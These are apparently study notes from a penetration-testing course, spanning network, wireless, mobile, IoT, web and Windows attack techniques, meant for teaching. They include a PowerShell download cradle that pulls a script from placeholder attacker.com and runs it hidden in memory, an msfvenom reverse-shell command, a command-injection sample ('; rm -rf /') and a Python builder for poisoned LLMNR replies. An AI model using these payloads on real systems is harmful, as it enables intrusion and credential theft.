2. WinRM:
   - Windows Remote Management via CLI or PowerShell.
   - Command: winrm quickconfig to enable the service.
3. PsExec:
   - Issues remote commands via SMB without pre-installed clients.
   - Example: psexec \\192.168.1.50 -s "C:\malicious.exe".

Network Utilities
1. Netcat:
   - CLI utility for creating TCP/UDP connections.
   - Features:
     - Proxy or relay.
     - File transfers.
     - Launching backdoor shells.
   - Syntax: nc [options] [target] [port].
2. Ncat:
   - Advanced version of Netcat.
   - Modes:
     - Client: Initiates connections.
     - Server: Listens for connections.
   - Bundled with Nmap, with additional features such as encrypted communication.

6. Using Proxies and ProxyChains

Proxies
- Mediate communications between clients and servers.
- Provide caching, filtering, and location concealment.

ProxyChains4
- CLI tool for tunneling traffic through proxies.
- Features:
  - Integrates with Tor for anonymization.
  - Encrypts traffic within the tunnel.

7. Practical Techniques

Preventing Detection
- Use fragmentation, decoys, and randomization to avoid IDS detection.
- Reduce scan aggressiveness with -T switches.

Using Steganography
- Hide sensitive data in media files or whitespace.

Remote Management
- Exploit tools like WinRM and PsExec for lateral movement.

Module 9

1. Enumerating Hosts
Discovering Services
 Key Ports and Protocols:
o SMTP (Port 25): Extract email addresses, enumerate server info, search
for open relays.
o DNS (Port 53): Perform zone transfers, discover subdomains.
o SMB (Port 139): Retrieve directory information, list, and transfer files.
Enumerating Shares
 Microsoft Hosts:
o Use SMB protocol via Ports 139 or 445.
o Tools: Metasploit, ShareEnum (Sysinternals).
 Linux/Unix Hosts:
o Use NFS (Network File System) via Port 2049.
Website Enumeration
 Nmap Scripts:
o Example: nmap --script=http-enum <target> to discover web application
resources.
 Non-Standard Ports:
o Scan all ports to identify non-standard service bindings.
Active Directory (AD) Enumeration
 PowerShell Cmdlets:
o Get-NetDomain: Get current domain.
o Get-NetLoggedon: List logged-on users.
o Get-NetGroupMember: Retrieve domain group members.
Linux Enumeration
 Metasploit Modules:
o post/linux/enum_system: Enumerates configurations, networks, and users.
 Bash Commands:
o finger: Displays user information.
o cat /etc/passwd: Lists system users.

2. LAN Protocol Exploitation


VLAN Hopping
 Techniques:
o MAC Overflow (Macof Attack): Overflows switch MAC tables to turn
them into hubs.
o Trunk Port Misuse: Configure attacker’s interface as a trunk port to
access all VLANs.
On-Path Attacks
 Malicious interception of communication paths.
 Examples:
o SSL/TLS Stripping: Downgrades secure HTTPS connections.
o Wi-Fi Pineapple: Acts as a rogue access point.
Spoofing and Poisoning
 Types:
o DNS Cache Poisoning: Redirects traffic to malicious domains.
o ARP Spoofing: Misleads devices about the correct MAC address for a
given IP.
o LLMNR/NBT-NS Poisoning: When DNS cannot resolve a name, Windows falls back
to multicast LLMNR and broadcast NBT-NS queries, and any host on the
segment may answer.
 Tools: Responder answers these queries with the attacker's address
and captures the NetNTLM challenge/response when the victim authenticates
to it.
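The exchange behind LLMNR poisoning, as an added example that is not part of the original notes or of the Responder project: the victim's multicast query, the poisoner's unicast reply, and the honeypot-style check defenders use (query a name that cannot exist; anyone who answers is a poisoner). The host name, transaction ID and attacker address are constructed sample values, and the packets are built by hand from the DNS-style wire format so the whole thing runs offline.

```python
import socket
import struct

LLMNR_PORT = 5355            # UDP port used by LLMNR
LLMNR_GROUP = "224.0.0.252"  # IPv4 multicast group the client sends the query to
TYPE_A, CLASS_IN = 1, 1


def encode_name(name):
    """DNS-style label encoding: <len><label>... terminated by a zero byte."""
    labels = b"".join(bytes([len(p)]) + p.encode("ascii") for p in name.split("."))
    return labels + b"\x00"


def decode_name(buf, off):
    """Inverse of encode_name; returns (name, offset just past the terminator)."""
    labels = []
    while True:
        n = buf[off]
        off += 1
        if n == 0:
            return ".".join(labels), off
        labels.append(buf[off:off + n].decode("ascii"))
        off += n


def build_query(txid, name):
    """Victim side: the multicast query sent when DNS cannot resolve `name`."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)  # flags 0 = query
    return header + encode_name(name) + struct.pack(">HH", TYPE_A, CLASS_IN)


def build_poisoned_reply(query, attacker_ip, ttl=30):
    """Poisoner side: echo the ID and question, answer with our own address."""
    txid = struct.unpack(">H", query[:2])[0]
    name, off = decode_name(query, 12)
    question = query[12:off + 4]                      # name + QTYPE + QCLASS
    header = struct.pack(">HHHHHH", txid, 0x8000, 1, 1, 0, 0)  # QR=1 = response
    answer = (encode_name(name)
              + struct.pack(">HHIH", TYPE_A, CLASS_IN, ttl, 4)
              + socket.inet_aton(attacker_ip))
    return header + question + answer


def parse_reply(reply):
    """Decode a reply into (txid, name, ip, ttl); None if it carries no A record."""
    txid, flags, _qd, an = struct.unpack(">HHHH", reply[:8])
    if not flags & 0x8000 or an == 0:
        return None
    name, off = decode_name(reply, 12)
    off += 4                                   # skip QTYPE/QCLASS of the question
    _, off = decode_name(reply, off)           # answer name (uncompressed here)
    rtype, _rclass, ttl, rdlen = struct.unpack(">HHIH", reply[off:off + 10])
    off += 10
    if rtype != TYPE_A or rdlen != 4:
        return None
    return txid, name, socket.inet_ntoa(reply[off:off + 4]), ttl


def detect_poisoner(probe_name, reply):
    """Defender side: query a name that cannot exist; any answer is a poisoner."""
    parsed = parse_reply(reply)
    return parsed is not None and parsed[1] == probe_name


if __name__ == "__main__":
    q = build_query(0x1234, "fileserver01")           # constructed victim query
    r = build_poisoned_reply(q, "10.0.0.66")          # constructed attacker reply
    print("query  :", q.hex())
    print("reply  :", r.hex())
    print("parsed :", parse_reply(r))
    probe = build_query(7, "nonexistent-host-7731")
    print("poisoner detected:",
          detect_poisoner("nonexistent-host-7731",
                          build_poisoned_reply(probe, "10.0.0.66")))
```

On a live segment the query would be sent with a UDP socket to (LLMNR_GROUP, LLMNR_PORT) and the reply arrives unicast from the poisoner; the TTL of 30 mirrors what Responder sends. The fix on the client side is the "Turn off multicast name resolution" group policy and disabling NetBIOS over TCP/IP, which removes the fallback the attack depends on.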
Password Hash Attacks
 Pass the Hash: Authenticates over NTLM with a stolen NT hash without cracking it.
 Kerberoasting:
o Any domain user can request a TGS ticket for a service account's SPN; the
ticket is encrypted with that service account's password hash.
o The ticket is cracked offline to recover the plaintext service password.
Exploit Chaining
 Combines multiple exploits for a comprehensive attack.
 Examples:
o Compromising a network, planting a device, and escalating privileges.

3. Exploit Tools
Metasploit Framework (MSF)
 Modules:
o Exploits, Payloads, and Auxiliary.
 Popular Payload:
o Meterpreter: Interactive payload for post-exploitation.
 Options:
o RHOSTS, LHOST, and RPORT for targeting.
Other Tools
 Impacket: Python library for Windows network protocols (SMB, MSRPC, Kerberos,
LDAP) with example scripts such as psexec.py, secretsdump.py, and GetUserSPNs.py.
 Responder: Poisons LLMNR, NBT-NS, and mDNS name requests.
 mitm6: Answers DHCPv6 requests to become the victim's IPv6 DNS server and
hijack name resolution (usually chained with NTLM relay).
 Exploit DB: Searchable database of public exploits (available offline via
searchsploit).

4. Cloud Exploitation
Cloud Asset Risks
 Configuration Vulnerabilities:
o Misconfigured permissions, storage, or container settings.
o Embedded malware in container images.
 IAM Risks:
o Privileged or shared accounts increase exposure.
Cloud Attacks
 Common Types:
o Malware injection, side-channel, direct-to-origin attacks.
 Privilege Escalation:
o Weak process permissions or unpatched vulnerabilities.
Cloud PenTesting Tools
 ScoutSuite:
o Multicloud audit tool.
 Prowler:
o AWS-specific audit tool.
 Pacu:
o AWS exploitation framework.
 Cloud Custodian:
o Policy-based resource management.

5. Denial of Service (DoS)


Effects
 Consumes system resources, locks out legitimate users.
 Attack Types:
o Packet flood, Slowloris, HTTP flood, DNS amplification.
 Tools:
o Slowloris script, R-U-Dead-Yet (RUDY), Hyenae.
6. Key Takeaways
 LAN and Cloud:
o Secure VLAN configurations to prevent hopping.
o Regularly audit cloud permissions and containers.
 Tools:
o Leverage Nmap, Metasploit, and specialized cloud tools for thorough
testing.

Module 10

1. Wireless Attacks
Securing Wireless Transmissions
 Vulnerability:
o Wireless transmissions are susceptible to interception since they use
unbounded radio waves.
o Risk includes sniffing sensitive data like login credentials and credit card
numbers.
Encryption Standards:
 WPA2:
o Uses AES-CCMP for confidentiality and integrity; the PSK is derived from the
passphrase, and a captured 4-way handshake can be attacked offline.
 WPA3:
o Replaces the PSK handshake with SAE (Dragonfly), giving forward secrecy and
resistance to offline dictionary attacks on a captured handshake.
Common Wireless Attacks:
1. Eavesdropping:
o Sniff unencrypted data from public/open Wi-Fi.
o Obtain client MAC addresses for spoofing.
2. Deauthentication (Deauth) Attack:
o Boots clients from an AP to force reauthentication.
o Tools:
 Airodump-ng: Captures handshake packets.
 Aireplay-ng: Executes deauth attacks.
3. Signal Jamming:
o Disrupts Wi-Fi signals via physical or software-based jammers.
o Example tool: Wi-Fi jammer (Python-based).
4. WPA Cracking:
o Dictionary attacks against a captured WPA/WPA2 4-way handshake
(aircrack-ng, hashcat) recover weak passphrases.
o KRACK (Key Reinstallation Attack) instead abuses key reinstallation in the
WPA2 handshake to force nonce reuse and decrypt traffic; it does not
recover the passphrase.
WPS PIN Attacks:
 Methods:
o Exploit "push-to-connect" features.
o Brute force WPS PINs using tools like Reaver (included in Kali Linux).

2. Wireless Tools
Aircrack-ng Suite
 Airmon-ng:
o Enables and disables monitor mode on wireless interfaces.
 Airodump-ng:
o Captures 802.11 frames, identifies BSSID and client MAC addresses.
 Aireplay-ng:
o Injects packets to perform attacks (e.g., deauthentication).
Kismet
 Features:
o Packet capture, wireless IDS, and network discovery.
o Works with software-defined radios (SDRs).
o Saves captured handshakes for password cracking.
Wifite2
 Capabilities:
o Wireless auditing tool for WLANs.
o Identifies networks advertising WPS and encryption types.
o Captures handshakes and prioritizes weaker targets.
Fern
 Purpose:
o Tests wireless networks, recovers WEP/WPA/WPA2 keys.
o Methods: Brute force, dictionary attacks, replay, session hijacking.
 Dependencies:
o Python, Aircrack-ng, Macchanger.
EAPHammer
 Features:
o Launch evil twin attacks using a rogue AP.
o Capture WPA/WPA2-Enterprise (EAP) credentials, e.g., MSCHAPv2
challenge/response pairs, which are then cracked offline.
o Perform captive portal attacks to capture credentials.
MDK4
 Modules:
o Mode a: Authentication DoS.
o Mode b: Creates fake wireless networks.
o Mode p: Probes and brute forces hidden SSIDs.
o Mode d: Disconnects and disassociates all clients from an AP.

3. Wireless Testing Steps


1. Preparation:
o Scan all channels to locate networks.
o Grade networks by signal strength.
o Gather information about encryption types, WPS status, and hidden
SSIDs.
2. Tool Setup:
o Ensure wireless card supports monitor mode and packet injection.
o Choose appropriate antenna based on distance and coverage needs.

4. Bluetooth PenTesting
Spooftooph:
 Clones or spoofs Bluetooth devices.
 Blends into the network to monitor device interactions.

5. Summary of Attack Techniques


 Deauth Attacks:
o Disrupt connections to capture reauthentication data.
 Jamming:
o Disables wireless access by flooding frequencies.
 Evil Twin:
o Creates a rogue AP to steal credentials.
 WPS PIN Brute Force:
o Exploits weak WPS implementations.

Module 11

1. Mobile Device Vulnerabilities


Deployment Methods
 BYOD (Bring Your Own Device):
o Employees use personal devices for work.
o Risks: Lack of centralized control, increased attack surface.
 COBO (Corporate-Owned, Business Only):
o Strictly business devices, fully controlled by the organization.
 COPE (Corporate-Owned, Personally Enabled):
o Hybrid approach allowing personal use on corporate-owned devices.
 CYOD (Choose Your Own Device):
o Employees select a preapproved device owned by the organization.
Access Control Methods
 Factors:
o What You Know: Passwords, PINs.
o What You Have: Smart cards, USB tokens.
o What You Are: Biometrics (e.g., fingerprint, face ID).
o Where You Are: Location-based access.
o Context Awareness: Environmental factors (e.g., geolocation).

Enterprise Mobility Management (EMM)


 Functions:
o Mobile Device Management (MDM): Controls authentication, feature use,
and connectivity.
o Mobile Application Management (MAM): Prevents unauthorized app use,
pushes updates.
o Prevents root/jailbreaking, restricts data transfer to personal apps.

2. Threats to Mobile Devices


Common Mobile Vulnerabilities
 Android:
o Unpatched older OS versions.
o Custom ROMs and third-party apps.
o Apps downloaded from unofficial sources.
 iOS:
o More secure but vulnerable to jailbreaking.
o Jailbreaking allows unsigned code execution and root access.
Threats to Business Logic:
 Lost or stolen devices.
 Lack of antimalware protection.
 Use of vulnerable components.

3. Mobile Device Attacks


Techniques
 Malware Types:
o Spyware, Trojans, Rootkits, Worms.
 Biometric Spoofing:
o Exploiting poorly implemented systems.
 Root Exploits:
o Attacks enabled by rooted/jailbroken devices.
 Permission Overreach:
o Apps requesting excessive privileges.
Social Engineering:
 SMiShing: Phishing via SMS.
 Vishing: Phishing via VoIP.
 Browser Hijacking: Redirects users to malicious sites.
 Drive-by Downloads: Malicious payloads downloaded without user knowledge.
Bluetooth Attacks:
 Bluejacking:
o Sends unwanted messages, images, or videos to Bluetooth devices.
 Bluesnarfing:
o Reads sensitive data (e.g., contacts, emails) from a Bluetooth device.

Malware Analysis
 Reverse Engineering:
o Decompile and analyze malicious code.
 Sandbox Analysis:
o Safely execute malware to observe behavior.

4. Assessment Tools for Mobile Devices


Kali Linux Tools
 Ettercap:
o Conducts man-in-the-middle (on-path) attacks.
 Android SDK:
o Builds, tests, and reverse engineers Android apps.
 Burp Suite:
o Web application testing tool, supports iOS testing.
Mobile Security Framework (MobSF)
 Capabilities:
o Static Analysis:
 Evaluate code for Android and iOS apps.
o Dynamic Analysis:
 Assess running apps and detect jailbreaks/rooting.
Mobile Security Testing Guide (MSTG)
 Key Features:
o Security recommendations for Android/iOS.
o Resiliency testing for reverse engineering and tampering.
o Extensive checklists and external resources.
5. Tools for Code and API Testing
Frida and Objection
 Frida:
o Dynamic instrumentation toolkit: injects JavaScript into a running process
to hook functions, read plaintext data before it is encrypted, dump process
memory, and bypass jailbreak/root-detection checks.
 Objection:
o Runtime exploration toolkit built on Frida; explores an app's file system,
keychain/keystore, and classes without a jailbroken or rooted device, and
runs custom Frida scripts.
Drozer
 Purpose:
o Identifies Android security flaws.
o Simulates app interactions as a user.
 Additional Tools:
o APKX: Decompiles APK files to analyze Java source code.
o APK Studio: An integrated development environment for editing APK files.
Postman
 API Testing:
o Creates and tests APIs.
o Analyzes results, runs reports, integrates with DevOps pipelines.

6. Summary of Threats and Tools


Common Threats:
 Rooting, jailbreaking, malware infections, and data exfiltration.
 Social engineering attacks tailored for mobile platforms.
Essential Tools:
 MobSF: Mobile app analysis.
 Frida/Objection: Debugging and code examination.
 Postman: API testing and integration.
Module 12

1. IoT Attacks
Understanding IoT Vulnerabilities
 IoT devices often lack sufficient security, making them vulnerable to:
o Standard Attacks:
 Buffer overflows, SQL injection, SYN floods, privilege escalation.
o Component Weaknesses:
 Preloaded malware or backdoors.
 Hardcoded configurations that are difficult to modify.
 Poor vendor patching processes.
Common Vulnerabilities:
1. Unencrypted Communications:
o Many IoT devices transmit data in plaintext.
o Intercepted data can be read or modified.
2. Physical Security Risks:
o Small, exposed devices (e.g., IP cameras) are easily damaged or stolen.
3. Data Leakage:
o Bluetooth Low Energy (BLE) can expose device models, smart home
activities, and user data.
IoT-Specific Attacks:
1. Denial of Sleep:
o Continuously sends signals to prevent rest cycles, draining the device
battery.
2. CoAP and MQTT Exploits:
o CoAP: Vulnerable to spoofing and coercive parsing.
o MQTT: Vulnerable to sniffing and botnet infections.
2. Data Storage Systems
Types of Storage Systems:
1. DAS (Direct-Attached Storage):
o Local storage (e.g., hard drives).
2. NAS (Network-Attached Storage):
o File servers connected to the network.
3. SAN (Storage Area Network):
o High-performance storage on a dedicated subnetwork.
Common Vulnerabilities:
1. Default Configurations:
o Weak or default usernames/passwords.
2. Management Interface Issues:
o Improper configurations expose the network and enable direct access to
data.

3. Industrial Control Systems (ICS)


ICS Characteristics:
 Used to manage industrial and critical infrastructure assets over networks.
 Often outdated and lack modern security standards.
SCADA and IIoT:
1. SCADA (Supervisory Control and Data Acquisition):
o Manages large-scale, geographically distributed devices.
2. IIoT (Industrial Internet of Things):
o Complements SCADA by integrating IoT capabilities for better data
collection.

4. Vulnerability Causes
1. Error Messages:
o Detailed error messages can leak:
 User credentials, software versions, and configuration paths.
o Example:
 A verbose error with full pathname can lead to Directory Traversal
attacks.
2. Fuzzing:
o Sends large volumes of malformed, random, or boundary-case inputs to an
application or protocol to trigger crashes and unexpected behavior; in web
testing the term also covers brute-forcing paths and parameters (e.g., with
ffuf or wfuzz).
o Examples of findings:
 Admin login pages.
 Misconfigured file paths.

5. Virtual Machine (VM) Vulnerabilities


Virtualization Components:
1. Host Hardware:
o Physical hardware running virtual environments.
2. Hypervisor (Virtual Machine Monitor):
o Type I (Bare Metal): Installed directly on hardware (e.g., VMware ESXi).
o Type II (Host-Based): Runs on an OS (e.g., VirtualBox).
3. Guest Operating Systems:
o Virtual machines installed on the host.
VM Security Risks:
1. VM Sprawl:
o Uncontrolled creation of VMs without proper management.
2. Bad Repositories:
o Compromised VM templates that include vulnerabilities.

Common VM Attacks:
1. VM Escape:
o Malware in a VM interacts directly with the hypervisor or host.
o Prevention:
 Apply patches to hypervisors.
 Use effective service design and network segmentation.
2. Hyperjacking:
o A malicious actor takes control of the hypervisor.
o Impact:
 Full access to all VMs and their data.

6. Container Security
 Containers:
o Agile environments for application provisioning.
o Vulnerabilities stem from:
 Misconfigured images containing unnecessary software.
 Lateral movement due to unrestricted access.

7. Attack Classes in Virtual Environments


1. Class 1:
o Attack happens outside of the VM.
2. Class 2:
o Attack targets the VM directly.
3. Class 3:
o Attack originates from within the VM.

8. Key Takeaways
IoT:
 Test devices for vulnerabilities before deployment.
 Enforce encryption and access control measures.
Virtualization:
 Monitor and secure hypervisors and repositories.
 Implement strict policies to prevent VM sprawl.
Industrial Systems:
 Regularly update and segment SCADA/ICS networks.
 Audit configurations to eliminate vulnerabilities.

Module 13

1. OWASP Top 10 Vulnerabilities


Common Vulnerabilities (identifiers below follow the 2017 Top 10; the 2021 list
renumbers them as A03 Injection, A02 Cryptographic Failures, and A05 Security
Misconfiguration)
1. Injection Attacks (A1):
o Includes SQL, OS, NoSQL, and LDAP injection.
o Example: Using malicious input like ' OR '1'='1 to manipulate queries.
2. Sensitive Data Exposure (A3):
o Results from weak or missing encryption, insecure configurations, or verbose
error messages.
o Example: Misconfigured HTTP headers leaking sensitive information.
3. Security Misconfigurations (A6):
o Default configurations or open cloud storage exposing systems.
o Example: Debugging enabled in production environments.

2. Web Application Exploits


Session Attacks
 Session Hijacking:
o Stealing session tokens (e.g., cookies) to impersonate a user.
 Session Fixation:
o Forcing a victim to use a known session ID for later exploitation.
 Session Replay:
o Reusing captured credentials to access a session.
Cross-Site Request Forgery (CSRF/XSRF)
 Exploits trust in the user’s browser to perform unauthorized actions on behalf of
the user.
 Example: Submitting a malicious form while authenticated.
Privilege Escalation
1. Horizontal:
o Accessing another user's data or permissions.
2. Vertical:
o Gaining higher-level privileges (e.g., admin access).

3. Injection Attacks
SQL Injection (SQLi)
 Simple Test: Using ' to identify vulnerable points.
 Blind SQLi: Exploiting SQL vulnerabilities without visible outputs.
 Stacked Queries: Sending multiple queries in a single request.
Directory Traversal
 Exploits improper validation of file paths.
 Example: Using ../../ to access restricted directories.
Command Injection
 Executes system commands via unsanitized user input.
 Example: Supplying input like ; rm -rf / to a shell command.
Cross-Site Scripting (XSS)
1. Persistent:
o Code stored on the server and executed for all users.
2. Reflected:
o Injected code immediately returned to the victim.
3. DOM-Based:
o Exploits client-side JavaScript to manipulate the DOM.

4. Tools for Web Application Testing


Web Testing Tools
1. WPScan:
o Scans WordPress sites for vulnerable core versions, plugins, and themes, and
enumerates users.
2. CrackMapExec:
o Network/Active Directory post-exploitation tool (SMB, WinRM, LDAP); it is not
a web scanner, but it identifies AD misconfigurations and tests credentials
across many hosts.
Browser Exploit Framework (BeEF)
 Purpose:
o Targets browser vulnerabilities for XSS and injection attacks.
 Functionality:
o Hooks browsers to gain information or perform attacks.
 Interface:
o Lists hooked browsers as online/offline.
o Provides commands for further exploitation (e.g., use as a proxy, extract
internal IPs).

5. Exploiting Web Applications


Business Logic Flaws
 Result from faulty design leading to unintended application behaviors.
 Examples:
o No account lockout after multiple failed login attempts.
o Exploitable API endpoints in RESTful or SOAP APIs.
Non-Interactive Shells
 Limited functionality requiring upgrades to interactive shells.
 Commands may not auto-complete, and directories cannot be navigated
efficiently.
6. Adjusting for Defenses
Web Proxies
 Proxies intercept and filter web traffic, providing a barrier to PenTesters.
 PenTest Adaptations:
o Adjust traffic to bypass proxy filters.
o Test for proxy misconfigurations.

Key Takeaways
Web Testing Focus:
 Regularly test for OWASP vulnerabilities.
 Use tools like WPScan and BeEF to identify weaknesses.
Injection and Logic Flaws:
 Validate all user inputs.
 Test for flaws in API implementations and session handling.

Module 14

1. Understanding System Hacking


.NET and .NET Framework
 Key Points:
o The legacy .NET Framework is Windows-only; the newer .NET (formerly .NET
Core) is cross-platform and open source.
o Vulnerabilities exist in both, and .NET assemblies are easy to decompile.
o Used in many enterprise environments, making it a target for exploitation.

PowerShell for PenTesting


 Purpose:
o Automates tasks like registry manipulation, Active Directory enumeration,
and group policy management.
 Examples:
o Extract credentials using scripts.
o Inject payloads into processes.

C2 (Command and Control) Frameworks


1. Empire Framework:
o Uses PowerShell agents for post-exploitation tasks.
o Supports Windows and Linux environments.
2. Covenant:
o Highlights .NET-based attack surfaces.
o Cross-platform compatibility.
3. Mythic:
o Advanced C2 framework with multiple payload types.
o Highly customizable for MacOS targets.

2. Using Remote Access Tools


Netcat (nc)
 Purpose:
o Simple TCP/UDP utility for creating or connecting to network connections.
 Key Features:
o Port scanning, file transfer, and proxying.
o Syntax: nc [options] [target IP] [port].
Ncat
 Enhancements Over Netcat:
o Supports SSL/TLS encryption (--ssl), which hides the channel's content from
network inspection.
o Access control lists (--allow, --deny) and proxy support.
o Ships with Nmap.
Secure Shell (SSH)
 Capabilities:
o Secure remote management and tunneling.
o Command-line access for managing systems.
o Used for pivoting in network PenTests.

3. Exploit Code and Enumeration


Downloading Exploit Code
 PowerShell Command Example (download cradle):
o powershell.exe -nop -w hidden -c "IEX((New-Object
System.Net.WebClient).DownloadString('http://attacker.com/run.ps1'))"
o Explanation:
 Downloads a remote script into memory and executes it without writing
it to disk (attacker.com is a placeholder).
 -nop (-NoProfile) skips profile scripts; -w hidden hides the window.
 Useful for payload deployment in a PenTest; it is also a well-known
detection signature, so expect AMSI and EDR to flag it.
Scripting for Remote Access
 msfvenom Payload Example:
o msfvenom -p cmd/windows/reverse_powershell LHOST=<attacker IP> LPORT=<port>
o Options:
 -p cmd/windows/reverse_powershell: Generates a PowerShell one-liner that
opens a reverse shell back to LHOST:LPORT.
 Note: -nop is a powershell.exe switch, not an msfvenom option.

Enumerating Users and Assets


 Purpose:
o Identify usernames for credential-based attacks.
o Discover assets for further exploitation or pivoting.
 Tools:
o Meterpreter (part of Metasploit): Used for advanced enumeration and
lateral movement.
Exploiting Web Applications
 WordPress Exploits:
o Vulnerable WordPress installations often expose user data.
o Usernames can be enumerated by iterating the author parameter
(/?author=1, /?author=2, which redirects to the author's slug) or by querying
the REST API at /wp-json/wp/v2/users; WPScan automates both.

4. Reverse Engineering and Debugging


Reverse Engineering Techniques
1. Decompilation:
o Translates executable code into source code for analysis.
o Useful for recovering lost code or identifying vulnerabilities.
2. Disassembly:
o Converts machine code into assembly language.
o Requires expertise in low-level programming.
3. Debugging:
o Analyzes a program’s runtime state.
o Identifies bugs or potential vulnerabilities.
Software Development Kits (SDKs)
 Purpose:
o Provide tools for app development and debugging.
 Popular Debugging Tools:
o Immunity Debugger: Analyzes Windows executables.
o Ghidra: Reverse engineering platform.
o WinDbg: Debugger for Windows programs.

5. Key Takeaways
 PowerShell is a powerful tool for automating tasks and exploiting Windows
environments.
 C2 Frameworks like Empire and Covenant are essential for advanced
PenTesting.
 Reverse Engineering helps identify vulnerabilities in proprietary or custom
applications.
 Netcat and Ncat remain staples for network exploration and remote access.

Module 15

1. Introduction to Scripting
Definition:
 A script automates repetitive tasks, enhancing efficiency and accuracy.
 Benefits:
o Customizable for specific penetration testing needs.
o Reduces manual errors in tasks like network scans, file parsing, and data
collection.

2. Scripting Languages
Bash (Linux Shell Scripting):
 Used for automating tasks such as file and directory management, parsing logs,
and extending the functionality of security tools like Nmap and tcpdump.
PowerShell (Windows Scripting):
 Automates Windows-specific tasks like registry modifications, Active Directory
enumeration, and group policy analysis using cmdlets with a Verb-Noun syntax.
Python:
 Highly readable and widely used for PenTesting tasks like fuzzing, reverse
engineering, and web exploitation.
 Supports an extensive library ecosystem, including tools like Scapy and Recon-
ng.
Ruby:
 Primarily used for extending the Metasploit Framework, a key tool in a
PenTester’s arsenal.
Perl:
 Known for powerful text processing, Perl is used in system administration and
penetration testing for log analysis and data extraction.
JavaScript:
 Enables dynamic interaction on web pages and is commonly used for web
application testing and exploitation.

3. Essential Scripting Concepts


Variables:
 Store data that can be referenced throughout the script.
 Variable syntax varies across languages but serves the purpose of holding
values for reuse.
Logic and Flow Control:
 Determines the script’s execution path based on conditions.
o If Statements: Executes a block of code when a condition is true.
o Loops: Repeats tasks for a defined number of times or until a condition is
met.
Boolean Operators:
 AND: True if both conditions are true.
 OR: True if at least one condition is true.
 NOT: Inverts the truth value of a condition.
Data Structures:
 Lists: Ordered collections of items.
 Sets: Unordered collections of unique elements.
 Dictionaries: Key-value pairs for structured data.
 Tuples: Immutable, ordered collections.
JSON (JavaScript Object Notation):
 A standard data format for transmitting structured data, used extensively in web
applications.

4. Automating PenTesting Tasks


Port Scanning Automation:
 Automates the scanning of multiple targets provided in a structured format (e.g.,
a spreadsheet).
 The process typically involves importing data, performing scans, and exporting
results to a report.
Automation Benefits:
 Reduces time spent on repetitive tasks.
 Improves accuracy and consistency in results.
Lab Practices:
 Labs focus on configuring tools like Nmap, automating scans, and generating
reports using scripting.
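The automation described above, written out as an added example (not code from the original notes or from the Nmap project): import targets from a spreadsheet export, build one Nmap command per target, parse Nmap's XML output, and export a findings report. The target CSV and the Nmap XML are constructed samples so the script runs offline; `run_scan()` is the only step that needs Nmap installed and is not called by default.

```python
import csv
import io
import subprocess
import xml.etree.ElementTree as ET

# Constructed sample input: the target list a tester might receive as a spreadsheet export.
SAMPLE_TARGETS_CSV = """hostname,ip,ports
web01,10.0.0.10,80;443
dc01,10.0.0.5,53;88;445
"""

# Constructed sample of what `nmap -sV -oX -` prints for web01 (trimmed to what we parse).
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -p 80,443 -oX - 10.0.0.10">
  <host>
    <status state="up" reason="echo-reply"/>
    <address addr="10.0.0.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80">
        <state state="open" reason="syn-ack"/>
        <service name="http" product="Apache httpd" version="2.4.41"/>
      </port>
      <port protocol="tcp" portid="443">
        <state state="open" reason="syn-ack"/>
        <service name="https" product="Apache httpd" version="2.4.41"/>
      </port>
      <port protocol="tcp" portid="22">
        <state state="filtered" reason="no-response"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


def load_targets(csv_text):
    """Step 1: import targets; ports are ';'-separated in the sheet, ints here."""
    targets = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        ports = [int(p) for p in row["ports"].split(";") if p.strip()]
        targets.append({"hostname": row["hostname"].strip(),
                        "ip": row["ip"].strip(), "ports": ports})
    return targets


def build_nmap_cmd(target):
    """Step 2: one Nmap invocation per target; -oX - writes XML to stdout."""
    ports = ",".join(str(p) for p in target["ports"])
    return ["nmap", "-sV", "-p", ports, "-oX", "-", target["ip"]]


def run_scan(target):
    """Runs Nmap for real (needs nmap on PATH); not called in the offline demo."""
    return subprocess.run(build_nmap_cmd(target), capture_output=True,
                          text=True, check=True).stdout


def parse_nmap_xml(xml_text):
    """Step 3: flatten the XML into one row per (host, port)."""
    rows = []
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            svc = port.find("service")
            rows.append({
                "ip": addr,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "state": port.find("state").get("state"),
                "service": svc.get("name", "") if svc is not None else "",
                "product": svc.get("product", "") if svc is not None else "",
                "version": svc.get("version", "") if svc is not None else "",
            })
    return rows


def render_report(rows, only_open=False):
    """Step 4: export as CSV text (opens in the same spreadsheet tool)."""
    out = io.StringIO()
    writer = csv.writer(out, lineterminator="\n")
    writer.writerow(["ip", "port", "proto", "state", "service", "product", "version"])
    for r in rows:
        if only_open and r["state"] != "open":
            continue
        writer.writerow([r["ip"], r["port"], r["proto"], r["state"],
                         r["service"], r["product"], r["version"]])
    return out.getvalue()


if __name__ == "__main__":
    for t in load_targets(SAMPLE_TARGETS_CSV):
        print(" ".join(build_nmap_cmd(t)))          # the commands that would run
    print(render_report(parse_nmap_xml(SAMPLE_NMAP_XML), only_open=True))
```

To run it for real, replace the sample XML with `run_scan(t)` for each target; keeping the scan, parse and report steps as separate functions is what makes the script reusable for other scanners and easy to test without touching the network.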

5. Object-Oriented Programming (OOP)


 Core Concepts:
o Functions: Modular and reusable code blocks.
o Classes: Templates for creating objects with attributes and behaviors.
o Modules: Collections of reusable functions and classes for streamlined
development.

6. Key Takeaways
 Scripting Tools:
o Python and Bash are versatile for most PenTesting tasks.
o PowerShell excels in automating Windows-specific workflows.
 Practical Applications:
o Scripting enhances efficiency in PenTesting by automating tasks like
enumeration, scanning, and data parsing.
Module 16

1. Offline Password Attacks


Definition:
 Occurs when attackers obtain a copy of usernames and password hashes (e.g.,
/etc/shadow on Linux, the SAM database on Windows) and crack them on their
own systems, so no lockout policy or rate limit applies.
Types of Attacks:
1. Dictionary Attack:
o Uses a predefined list of common passwords, usually expanded with mangling
rules (capitalization, appended digits or symbols).
o Succeeds only if the password, or a rule-derived variant, is in the list.
2. Brute Force Attack:
o Tests all possible combinations of characters, often constrained by a mask
(e.g., ?u?l?l?l?d?d).
o Resource-intensive and time-consuming; cost grows exponentially with length.
3. Password Spraying (an online technique, included for contrast):
o Tries a few common passwords across many accounts against a live service,
staying under lockout thresholds.

